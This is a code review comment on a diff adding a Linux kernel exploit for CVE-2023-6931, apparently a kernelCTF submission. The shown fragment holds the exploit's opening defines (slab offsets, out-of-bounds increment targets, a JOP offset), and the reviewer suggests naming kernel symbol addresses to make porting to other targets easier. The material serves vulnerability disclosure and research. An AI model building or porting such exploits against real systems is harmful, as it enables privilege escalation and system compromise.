pocs/linux/kernelctf/CVE-2023-6931_lts_cos/exploit/lts-6.1.61/exploit.c

```diff
@@ -0,0 +1,324 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sched.h>
+#include <string.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <stdint.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/xattr.h>
+#include <sys/resource.h>
+#include <linux/perf_event.h>
+#include <linux/hw_breakpoint.h>
+#include <linux/netlink.h>
+#include <linux/rtnetlink.h>
+#include <linux/membarrier.h>
+
+#define READ_BUF_SIZE 2048
+
+#define SK_RCU_OFF 744
+#define SK_DESTRUCT_OFF 720
+#define JOP_OFF (READ_BUF_SIZE - SK_RCU_OFF + SK_DESTRUCT_OFF - XATTR_HDR_LEN)
+
+#define XATTR_HDR_LEN 32
+#define XATTR_DATA_LEN1 (READ_BUF_SIZE/2)
+#define XATTR_DATA_LEN2 (JOP_OFF + 8)
+
+/* How far out to inc */
+#define OOB_LOC1 688
+#define OOB_LOC2 1040
+/* Target event fds */
+#define TFD1 ((READ_BUF_SIZE - 8 + OOB_LOC1)/8)
+#define TFD2 ((READ_BUF_SIZE - 8 + OOB_LOC2)/8)
+/* Number of increments */
+#define NUM_INCS1 0x830
```

Comment:
If possible, then I think it would make it clearer what's going on if you would `#define` the kernel address for `sk_destruct` and `sk_write_space` and then use `#define NUM_INCS1 (SK_DESTRUCT - SK_WRITE_SPACE)`, maybe with a static assert that `NUM_INCS1 > 0`.

Similarly for `NUM_INCS2` you can add `#define`s for `netlink_bind` and `netlink_bind_ret_addr`.

This helps porting the exploit from one target to another.